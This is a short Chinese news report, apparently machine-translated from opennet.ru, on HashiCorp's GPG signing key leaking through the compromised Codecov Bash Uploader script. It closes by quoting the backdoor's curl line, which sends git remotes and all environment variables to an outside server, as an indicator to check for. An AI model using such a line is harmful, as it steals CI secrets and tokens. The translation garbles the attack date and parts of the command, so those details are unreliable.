以开发开源工具 Vagrant、Packer、Nomad 和 Terraform 而闻名的 HashiCorp 宣布,用于创建验证版本的数字签名的 GPG 私钥被泄露。 获得 GPG 密钥访问权限的攻击者可能会通过使用正确的数字签名验证 HashiCorp 产品来对它们进行隐藏更改。 同时,该公司表示,在审计过程中,没有发现任何试图进行此类修改的痕迹。
目前,受损的 GPG 密钥已被撤销,并引入了新密钥来取代它。 该问题仅影响使用 SHA256SUM 和 SHA256SUM.sig 文件的验证,并不影响通过releases.hashicorp.com 提供的 Linux DEB 和 RPM 包的数字签名生成,以及 macOS 和 Windows 的发布验证机制 (AuthentiCode) 。
泄漏的发生是由于在基础设施中使用了 Codecov Bash Uploader (codecov-bash) 脚本,该脚本旨在从持续集成系统下载覆盖率报告。 在对Codecov公司的攻击过程中,指定脚本中隐藏了一个后门,通过该后门将密码和加密密钥发送到攻击者的服务器。
为了进行黑客攻击,攻击者利用了创建 Codecov Docker 映像过程中的错误,这使得他们能够提取对 GCS(谷歌云存储)的访问数据,这是对从 codecov.io 分发的 Bash Uploader 脚本进行更改所必需的网站。 这些更改于 31 月 XNUMX 日进行,两个月内未被检测到,并允许攻击者提取存储在客户持续集成系统环境中的信息。 使用添加的恶意代码,攻击者可以获得有关经过测试的 Git 存储库和所有环境变量的信息,包括传输到持续集成系统的令牌、加密密钥和密码,以组织对应用程序代码、存储库和 Amazon Web Services 和 GitHub 等服务的访问。
除了直接调用之外,Codecov Bash Uploader 脚本还被用作其他上传器的一部分,例如 Codecov-action (Github)、Codecov-circleci-orb 和 Codecov-bitrise-step,其用户也受到该问题的影响。 建议所有使用 codecov-bash 和相关产品的用户审核其基础设施,并更改密码和加密密钥。 您可以通过以下行来检查脚本中是否存在后门:curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /上传/v2 || 真的
来源: opennet.ru